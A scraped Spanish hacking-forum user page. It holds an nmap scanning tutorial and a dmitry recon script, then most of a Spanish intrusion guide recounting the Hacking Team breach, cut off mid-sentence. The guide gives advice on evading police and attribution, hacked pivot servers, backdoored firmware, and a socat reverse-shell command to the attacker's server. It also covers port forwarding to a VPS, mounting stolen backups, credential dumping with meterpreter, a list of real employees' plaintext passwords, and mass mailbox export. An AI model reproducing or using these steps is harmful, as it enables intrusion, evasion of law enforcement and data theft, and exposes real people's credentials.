No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
alguien tiene el pass?
There is no one more blind than he refuses to see.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#1
Seguridad web y en servidores / Re: Inyección SQL by N0rf
Febrero 18, 2017, 07:43:24 PMThere is no one more blind than he refuses to see.
#2
International forum / Using NMAP with the brain
Febrero 18, 2017, 04:50:37 AMUsing NMAP with the brain
Hey everyone, maybe you have read my posts before ... like every day I try to explain good tips for pentesters ... I work attacking real-world targets, it's very different of pentest-cookbook labs enviroment, so I spect you obtain good information of this thread. Go ahead!.
Our good and weird friend, NMAP:
In real world security practitioners are often faced with multiple class C's, class B's or even in some cases, class A networks, we'll take the rest of this article to make a scan strategy for networks of all kind and sizes, and of course, tips and tricks
.If you see NMAP and No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, you can have an idea of how work with NMAP, I make my own and I'll start now.
Host discovery:
A methodical scanning usually involves perfoming host discovery first, this can prevent to scan amounts of dead IP space, this methods are listed:
-sn: Ping Scan - disable port scan
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol PingThe option we will focus on in this article is the most popular and the default for host discovery (-sn "Ping Scan").
One thing to note about the -sn "Ping Scan" option (formerly known as -sP) is that it does much more than just a traditional ICMP echo request. "Ping scan" consists of the following packets:
ICMP echo request
TCP SYN to 443
TCP ACK to 80
ICMP timestamp request
You can see the sequence here:
Citar
When you scan a local network, NMAP automatically switches to use ARP requests. This is obvious because fewer packets are sent and it's generally more accurate. Firewalls or another systems generally block or report ICMP traffic and filters TPC ports 80 and 443, so with this would be invisible to the four remote discovery packets sents above. However, host typically answer to ARP request to construct packet headers.
For the first packet capture, the scanning host was placed on a different subnet than that of the targets--this caused Nmap to use the 4 discovery packets shown in the picture. For the second packet capture, the scanning host was placed in the same broadcast range and this ARP was utilized for discovery. Both of the packet captures were created with the same discovery scan shown below.
Okay go more deep:
nmap -sn -T4 -oA Discovery 192.168.1.0/24CitarOptions explained:
-sn = "Ping scan"
-T4 = Throttle to aggressive
-oA <basename>= Output in all three formats (normal, XML, greppable)
Throttling Pro-tips:
Aggressive (-T4) throttling is substantially faster than the default Normal (-T3) throttle.
We have rarely (if ever) seen Aggressive scanning crash a host or flood a network. This should be what you start with unless you know of particular hosts that are sensitive to scanning. With that said, if hosts are known to crash on simple scans or become easily flooded, avoid scanning them with -T4 and possibly try Polite (-T2) throttling.
Please realize that -T2 may be up to 10 times slower than -T3, so be patient and only run it on your most sensitive hosts (not hundreds at a time).
More importantly, avoid any one-off scans such as version scanning as these are more likely to crash hosts than the speed of the scan. Some older SCADA components are known to fall over from simple port scanning, not to mention version scanning. In general, we do not recommend Insane mode (-T5) as this can negatively affect accuracy.
Lastly, we only recommend -T0 or -T1 when trying to be extra stealthy (IDS evasion) and only for scanning a few ports on a few hosts because it will likely be too slow for anything else.
Generate host-up-list
Nmap can scan huge amount of Ip addresses with iL option, we don't want to scan all the result of the recent scan (discovery), because we obtain live and dead hosts, so here is our friend NMAP who have output files, we can obtain all the dump with -oA option:
CitarCódigo: bash root@kali:~/Tests/Results/nmap/recon/# ls
Discovery.gnmap Discovery.nmap Discovery.xml
Files explained:
.nmap = Normal output (what is printed to the screen)
.gnmap = Greppable output
.xml = XML output
We will extract the up hosts from the .gnmap file using grep:
CitarCódigo: bash grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > upHost.txt
Cut options explained:
-f = field number (in this case, field 2)
-d = delimiter (in this case, a space)
Port discovery:
Okay we can our up hosts, we can start port discovery on these hosts. You need to have present if you have many up hosts or not you will select different kind of scans:
- Most common ports
- Full port scans
Source: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
So like a resume, TOP 1000 TCP ~ TOP 1000 UDP.
#3
Dudas y pedidos generales / Learn go or not go ?
Febrero 17, 2017, 12:31:10 AM
Okay, it's simple... Go lang (from google) is a good language to learn, any apprentice?
#4
International forum / Dmitrysome - Script for DMitry (Deepmagic Information Gathering Tool)
Febrero 16, 2017, 07:24:23 AM
Hello everyone ... in this night I was recon some targets using dmitry ... it's tedious cus you can't recon a lot of targets in one time, needs to be one per one, fuck that! ...
Código: bash
I'll update it ... someday /?
enjoy
echo -e ".-=~=- .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(__ _)
( _ __) ____ _ _ __ ____ ____ _ _ ____ __ _ _ ____ ( _ __)
(__ ) ( \( \/ )( )(_ _)( _ \( \/ )/ ___) / \ ( \/ )( __) ( __)
( __) ) D (/ \/ \ )( )( ) / ) / \___ \( O )/ \/ \ ) _) ( _)
(_ ) (____/\_)(_/(__) (__) (__\_)(__/ (____/ \__/ \_)(_/(____) (__ _)
( _ __) by 0xb4dc0d3 ( _ __)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(_ ___)
(__ _) (_____)
(_ ___) Usage: ./dmitrysome -winsepfb -t filename.txt (____ )
( _ __) ----------------------------------------------- (_____)
(__ _) -w ==> Whois lookup on the domain name of a host (__ __)
( _ __) -i ==> Whois lookup on the IP address of a host ( ____)
(_____) -n ==> Retrieve Netcraft information on a host (_ _ _)
(_ _) -s ==> Perform a search for possible subdomains (___ )
( _ _ ) -e ==> Perform a search for possible email address (__ _)
(__ ) -p ==> Perform a TCP port scan on a host (___ _)
(____ ) -f ==> Perform a TCP port scan on a host (filtered) (_____)
(__ ) -b ==> Read banners received from scanned ports (_____)
(_ ) -t ==> Set TTL in seconds scanning TCP ports (_ )
( ) (__ )
( _) /*/ Requires the -p flagged to be passed /*/ (_____)
( __) (_ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-(_ ___)"
echo -n "Insert options => "
read parameters
echo -n "Insert TTL => "
read ttl
echo "Running script ..."
while IFS='' read -r host || [[ -n "$host" ]]; do
gnome-terminal --tab -e "gnome-terminal --geometry=260x25-0+0 --tab -e 'dmitry -$parameters -t $ttl -o $host.txt $host'"
done < "$1"
I'll update it ... someday /?
enjoy
#5
HT.txt
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Una Guía DIY
,-._,-._
_,-\ o O_/;
/ , ` `|
| \-.,___, / `
\ `-.__/ / ,.\
/ `-.__.-\` ./ \'
/ /| ___\ ,/ `\
( ( |.-"` '/\ \ `
\ \/ ,, | \ _
\| o/o / \.
\ , / /
( __`;-;'__`) \\
`//'` `||` `\
_// || __ _ _ _____ __
.-"-._,(__) .(__).-""-. | | | | |_ _| |
/ \ / \ | | |_| | | | |
\ / \ / | | _ | | | |
`'-------` `--------'` __| |_| |_| |_| |__
#antisec
--[ 1 - Introdución ]-----------------------------------------------------------
Notarás el cambio de idioma desde la ultima edición [1]. El mundo de habla
inglesa ya tiene libros, charlas, guías, e información de sobra acerca de
hacking. En ese mundo hay muchos hackers mejores que yo, pero por desgracia
malgastan sus conocimientos trabajando para los contratistas de "defensa",
para agencias de inteligencia, para proteger a los bancos y corporaciones y
para defender el orden establecido. La cultura hacker nació en EEUU como una
contracultura, pero ese origen se ha quedado en la mera estética - el resto ha
sido asimilado. Al menos pueden llevar una camiseta, teñirse el pelo de azul,
usar sus apodos hackers, y sentirse rebeldes mientras trabajan para el
sistema.
Antes alguien tenía que colarse en las oficinas para filtrar documentos [2].
Se necesitaba una pistola para robar un banco. Hoy en día puedes hacerlo desde
la cama con un portátil en las manos [3][4]. Como dijo la CNT después del
hackeo de Gamma Group: "intentaremos dar un paso más adelante con nuevas
formas de lucha" [5]. El hackeo es una herramienta poderosa, ¡aprendamos y
luchemos!
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 2 - Hacking Team ]----------------------------------------------------------
Hacking Team era una empresa que ayudó a los gobiernos a hackear y espiar a
periodistas, activistas, contrincantes políticos, y otras amenazas a su poder
[1][2][3][4][5][6][7][8][9][10][11]. Y, muy de vez en cuando, a criminales y
terroristas [12]. A Vincenzetti, el CEO, le gustaba terminar sus correos con
el eslogan fascista "boia chi molla". Sería más acertado "boia chi vende RCS".
También afirmaban tener tecnología para solucionar el "problema" de Tor y el
darknet [13]. Pero visto que aún conservo mi libertad, tengo mis dudas acerca
de su eficacia.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[12] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[13] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 3 - Tengan cuidado ahí fuera ]----------------------------------------------
Por desgracia, nuestro mundo está al revés. Te enriquece por hacer cosas malas
y te encarcela por hacer cosas buenas. Afortunadamente, gracias al trabajo
duro de gente como los de "Tor project" [1], puedes evitar que te metan en la
cárcel mediante unas sencillas pautas:
1) Cifra tu disco duro [2]
Supongo que para cuando llegue la policía a incautar tu computadora,
significará que ya habrás cometido muchos errores, pero más vale prevenir
que curar.
2) Usa una máquina virtual y enruta todo el tráfico por Tor
Esto logra dos cosas. Primero, que todas las conexiones son anonimizadas a
través de la red Tor. Segundo, mantener la vida personal y la vida anónima
en computadoras diferentes te ayuda a no mezclarlas por accidente.
Puedes usar proyectos como Whonix [3], Tails [4], Qubes TorVM [5], o algo
personalizado [6]. Aquí [7] hay una comparación detallada.
3) (Opcional) No conectes directamente a la red Tor
Tor no es la panacea. Se pueden correlacionar las horas que estás conectado
a Tor con las horas que está activo tu apodo hacker. También han habido
ataques con éxito contra la red [8]. Puedes conectar a la red Tor a través
del wifi de otros. Wifislax [9] es una distribución de linux con muchas
herramientas para conseguir wifi. Otra opción es conectar a un VPN o un
nodo puente [10] antes de Tor, pero es menos seguro porque aún así se
pueden correlacionar la actividad del hacker con la actividad del internet
de tu casa (esto por ejemplo fue usado como evidencia contra Jeremy Hammond
[11]).
La realidad es que aunque Tor no es perfecto, funciona bastante bien.
Cuando era joven y temerario, hice muchas cosas sin nada de protección (me
refiero al hacking) aparte de Tor, que la policía hacía lo imposible por
investigar, y nunca he tenido problemas.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 3.1 - Infraestructura ]---------------------------------------------------
No hackeo directamente con las relés de salida de Tor. Están en listas negras,
van muy lentos, y no se pueden recibir conexiones inversas. Tor sirve para
proteger mi anonimato mientras me conecto a la infraestructura que uso para
hackear, la cual consta de:
1) Nombres de dominio
Sirve para direcciones de mando y control (C&C), y para hacer túneles de
DNS para egress asegurado.
2) Servidores Estables
Sirve para servidores C&C, para recibir shells inversas, para lanzar
ataques y para guardar el botín.
3) Servidores Hackeados
Sirven como pivotes para esconder la IP de los servidores estables, y para
cuando quiero una conexión rápida sin pivote. Por ejemplo escanear puertos,
escanear todo internet, descargar una base de datos con inyección de sql,
etc.
Obviamente hay que pagar de manera anónima, como bitcoin (si lo usas con
cuidado).
----[ 3.2 - Atribución ]--------------------------------------------------------
A menudo sale en las noticias que han atribuido un ataque a un grupo de
hackers gubernamentales (los "APTs"), porque siempre usan las mismas
herramientas, dejan las mismas huellas, e incluso usan la misma
infraestructura (dominios, correos etc). Son negligentes porque pueden hackear
sin consecuencias legales.
No quería hacer más fácil el trabajo de la policía y relacionar lo de Hacking
Team con los hackeos y apodos de mi trabajo cotidiano como hacker de guante
negro. Así que usé servidores y dominios nuevos, registrado con correos nuevos
y pagado con direcciones de bitcoin nuevas. Además, solo usé herramientas
públicas y cosas que escribí especialmente para este ataque y cambié mi manera
de hacer algunas cosas para no dejar mi huella forense normal.
--[ 4 - Recabar Información ]---------------------------------------------------
Aunque puede ser tedioso, esta etapa es muy importante, porque cuanto más
grande sea la superficie de ataque, más fácil será encontrar un fallo en una
parte de la misma.
----[ 4.1 - Información Técnica ]-----------------------------------------------
Algunos herramientas y técnicas son:
1) Google
Se pueden encontrar muchas cosas inesperadas con un par de búsquedas bien
escogidas. Por ejemplo, la identidad de DPR [1]. La biblia de como usar
google para hackear es el libro "Google Hacking for Penetration Testers".
También puedes encontrar un breve resumen en español en [2].
2) Enumeración de subdominios
A menudo el dominio principal de una empresa está alojado por un tercero, y
vas a encontrar los rangos de IP de la empresa gracias a subdominios como
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, No tienes permitido ver enlaces. Registrate o Entra a tu cuenta etc. Además, a veces hay cosas que no deben
estar expuestas en subdominios "ocultos". Herramientas útiles para
descubrir dominios y subdominios son fierce [3], theHarvester [4], y
recon-ng [5].
3) Búsquedas y búsquedas inversas de whois
Con una búsqueda inversa usando la información whois de un dominio o rango
de IPs de una empresa, puedes encontrar otros de sus dominios y rangos de
IPs. Que yo sepa, no hay manera gratuita de hacer búsquedas inversas de
whois, aparte de un "hack" con google:
"via della moscova 13" site:www.findip-address.com
"via della moscova 13" site:domaintools.com
4) Escaneo de puertos y fingerprinting
Diferente a las otras técnicas, esta habla con los servidores de la
empresa. Lo incluyo en esta sección porque no es un ataque, solo es para
recabar información. El IDS de la empresa puede generar una alerta al
escanear puertos, pero no tienes que preocuparte porque todo internet
está siendo escaneado constantemente.
Para escanear, nmap [6] es preciso, y puede fingerprint la mayória de
servicios descubiertos. Para empresas con rangos de IPs muy largas,
zmap [7] o masscan [8] son rápidos. WhatWeb [9] o BlindElephant [10]
puede fingerprint sitios web.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta/www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 4.2 - Información Social ]------------------------------------------------
Para la ingeniería social, es muy útil recabar información acerca de los
empleados, sus roles, información de contacto, sistema operativo, navegador,
plugins, software, etc. Algunos recursos son:
1) Google
Aquí también, es la herramienta más útil.
2) theHarvester y recon-ng
Ya las he mencionado en la sección anterior, pero tienen mucha más
funcionalidad. Pueden encontrar mucha información de forma rápida y
automatizada. Vale la pena leer toda su documentación.
3) LinkedIn
Se puede encontrar mucha información sobre los empleados aquí. Los
reclutadores de la empresa son los más propensos a aceptar tus solicitudes.
4) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Antes conocido como jigsaw. Tiene la información de contacto de muchos
empleados.
5) Metadatos de los archivos
Se puede encontrar mucha información sobre los empleados y sus sistemas en
los metadatos de archivos que la empresa ha publicado. Herramientas útiles
para encontrar archivos en el sitio web de la empresa y extraer los
metadatos son metagoofil [1] y FOCA [2].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 5 - Entrando en la Red ]----------------------------------------------------
Hay varias maneras de hacer la entrada. Ya que el método que usé para hacking
team es poco común y mucho más trabajoso de lo que normalmente es necesario,
voy a hablar un poco de los dos métodos más comunes, que recomiendo intentar
primero.
----[ 5.1 - Ingeniería Social ]-------------------------------------------------
Ingeniería social, específicamente spear phishing, es responsable de la
mayoría de los hackeos hoy día. Para una introducción en español, véase [1].
Para más información en inglés, véase [2] (la tercera parte, "Targeted
Attacks"). Para anécdotas divertidas de ingeniería social de las generaciones
pasadas, véase [3]. No quería intentar spear phishing contra Hacking Team,
porque su negocio es ayudar a los gobiernos a spear phish a sus opositores.
Por lo tanto hay un riesgo mucho más alto de que Hacking Team reconozca y
investigue dicho intento.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 5.2 - Comprar Acceso ]----------------------------------------------------
Gracias a rusos laboriosos y sus exploit kits, traficantes de tráfico, y
pastores de bots, muchas empresas ya tienen computadoras comprometidas dentro
de sus redes. Casi todos los Fortune 500, con sus enormes redes, tienen unos
bots ya adentro. Sin embargo, Hacking Team es una empresa muy pequeña, y la
mayoría de los empleados son expertos en seguridad informática, entonces había
poca probabilidad de que ya estuvieran comprometidas.
----[ 5.3 - Explotación Técnica ]-----------------------------------------------
Después del hackeo de Gamma Group, describí un proceso para buscar
vulnerabilidades [1]. Hacking Team tiene un rango de IP pública:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet
Hacking Team tenía muy poco expuesto al internet. Por ejemplo, diferente a
Gamma Group, su sitio de atención al cliente necesita un certificado del
cliente para conectar. Lo que tenía era su sitio web principal (un blog Joomla
en que Joomscan [2] no revela ningún fallo grave), un servidor de correos, un
par de routers, dos dispositivos VPN, y un dispositivo para filtrar spam.
Entonces tuve tres opciones: buscar un 0day en Joomla, buscar un 0day en
postfix, o buscar un 0day en uno de los sistemas embebidos. Un 0day en un
sistema embebido me pareció la opción más alcanzable, y después de dos semanas
de trabajo de ingeniería inversa, logré un exploit remoto de root. Dado que
las vulnerabilidades aún no han sido parcheadas, no voy a dar más detalles.
Para más información sobre como buscar este tipo de vulnerabilidades, véase
[3] y [4].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 6 - Estar Preparado ]-------------------------------------------------------
Hice mucho trabajo y pruebas antes de usar el exploit contra Hacking Team.
Escribí un firmware con backdoor, y compilé varias herramientas de
post-explotación para el sistema embebido. El backdoor sirve para proteger el
exploit. Usar el exploit sólo una vez y después volviendo por el backdoor hace
más difícil el trabajo de descubrir y parchear las vulnerabilidades.
Las herramientas de post-explotación que había preparado eran:
1) busybox
Para todas las utilidades comunes de UNIX que el sistema no tuvo.
2) nmap
Para escanear y fingerprint la red interna de Hacking Team.
3) No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
La herramienta más útil para atacar a redes Windows cuando tienes acceso a
la red interna pero no tienes un usuario de dominio.
4) Python
Para ejecutar No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
5) tcpdump
Para husmear tráfico.
6) dsniff
Para espiar contraseñas de protocolos débiles como ftp, y para hacer
arpspoofing. Quería usar ettercap, escrito por los mismos ALoR y NaGA de
Hacking Team, pero era difícil compilarlo para el sistema.
7) socat
Para un shell cómodo con pty:
mi_servidor: socat file:`tty`,raw,echo=0 tcp-listen:mi_puerto
sistema hackeado: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
tcp:mi_servidor:mi_puerto
Y para muchas cosas más, es una navaja suiza de redes. Véase la sección de
ejemplos de su documentación.
screenComo los pty de socat, no es estrictamente necesario, pero quería sentirme
como en casa en las redes de Hacking Team.
9) un servidor proxy SOCKS
Para usar junto a proxychains para acceder a la red interna con cualquier
otro programa.
10) tgcd
Para reenviar puertos, como lo del servidor SOCKS, a través del firewall.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lo peor que podía pasar era que mi backdoor o herramientas de post-explotación
dejasen inestable el sistema e hicieran que un empleado lo investigase. Por
lo tanto, pasé una semana probando mi exploit, backdoor, y herramientas de
post-explotación en las redes de otras empresas vulnerables antes de entrar en
la red de Hacking Team.
--[ 7 - Observar y Escuchar ]---------------------------------------------------
Ahora dentro de la red interna, quiero echar un vistazo y pensar antes de dar
el próximo paso. Enciendo No tienes permitido ver enlaces. Registrate o Entra a tu cuenta en modo análisis (-A, para escuchar sin
respuestas envenenadas), y hago un escaneo lento con nmap.
--[ 8 - Bases de Datos NoSQL ]--------------------------------------------------
NoSQL, o más bien NoAutenticación, ha sido un gran regalo a la comunidad
hacker [1]. Cuando me preocupo de que por fin han parcheado todo los fallos de
omisión de autenticación en MySQL [2][3][4][5], se ponen de moda nuevas bases
de datos sin autenticación por diseño. Nmap encuentra unos pocos en la red
interna de Hacking Team:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5
Fueron las bases de datos para instancias de prueba de RCS. El audio que graba
RCS es guardado en MongoDB con GridFS. La carpeta audio en el torrent [6]
viene de esto. Se espiaban sin querer a sí mismos.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 9 - Cables Cruzados ]-------------------------------------------------------
Aunque fue divertido escuchar grabaciones y ver imágenes webcam de Hacking
Team desarrollando su malware, no fue muy útil. Sus inseguras copias de
seguridad fueron la vulnerabilidad que abrieron sus puertas. Según su
documentación [1], sus dispositivos iSCSI deben estar en una red aparte,
pero nmap encuentra unos en su subred 192.168.1.200/24:
Nmap scan report for No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required
Nmap scan report for No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required
iSCSI necesita un modúlo de núcleo, y hubiese sido difícil compilarlo para el
sistema embebido. Reenvié el puerto para montarlo desde un VPS:
VPS: tgcd -L -p 3260 -q 42838
Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
Ahora iSCSI encuentra el nombre iqn.2000-01.com.synology pero tiene problemas
a la hora de montarlo porque cree que su dirección es 192.168.200.72 en vez de
127.0.0.1
La manera en que la solucioné fue:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
Y ahora después de:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
...el archivo de dispositivo aparece! Lo montamos:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
y encontramos copias de seguridad de varias máquinas virtuales. El servidor de
Exchange parece lo más interesante. Es demasiado grande como para descargarlo,
pero podemos montarlo remoto y buscar archivos interesantes:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
entonces el offset es 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
ahora en /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
encontramos el disco duro de la máquina virtual, y lo montamos:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
... y por fin hemos desempaquetado la muñeca rusa y podemos ver todos los
archivos del antiguo servidor Exchange en /mnt/part1
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 10 - De Copia de Seguridad a Administrador de Dominio ]---------------------
Lo que más me interesa de la copia de seguridad es buscar si tiene una
contraseña o hash que pueda usar para acceder al servidor actual. Uso pwdump,
cachedump, y lsadump [1] con los archivos del registro. lsadump encuentra la
contraseña de la cuenta de servicio besadmin:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
Uso proxychains [2] con el servidor socks en el sistema embebido y
smbclient [3] para comprobar la contraseña:
proxychains smbclient 'No tienes permitido ver enlaces. Registrate o Entra a tu cuenta' -U 'hackingteam.local/besadmin%bes32678!!!'
!Funciona! La contraseña de besadmin aún es válida, y es un administrador
local. Uso mi proxy y psexec_psh de metasploit [4] para conseguir una sesión
de meterpreter. A continuación migro a un proceso de 64 bits, "load kiwi" [5],
"creds_wdigest", y ya tengo muchas contraseñas, incluso la del administrador
del dominio:
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- ¡vaya sysadmin!
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 11 - Descargando los Correos ]-----------------------------------------------
Ahora que tengo la contraseña del administrador del dominio, tengo acceso a
los correos, el corazón de la empresa. Ya que con cada paso que doy hay un
riesgo de detección, descargo los correos antes de seguir explorando.
Powershell hace que sea fácil [1]. Curiosamente, encontré un bug con el manejo
de fechas. Después de conseguir los correos, me demoró un par de semanas en
conseguir el código fuente y lo demás, así que regresé de vez en cuando para
descargar los correos nuevos. El servidor era italiano, con las fechas en el
formato día/mes/año. Uso:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
con el New-MailboxExportRequest para descargar los correos nuevos (en este
caso todos los correos a partir del día 5 de junio. El problema es que dice
que la fecha es inválida si el día es mayor que 12 (imagino que esto se debe a
que en EEUU el mes está primero y no puede ser un mes mayor que 12). Parece
que los ingenieros de Microsoft solo han probado su software con su propia
configuración regional.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 12 - Descargando Archivos ]-------------------------------------------------
Ahora que soy un administrador del dominio, también empecé a descargar los
recursos compartidos usando mi proxy y la opción -Tc de smbclient, por
ejemplo:
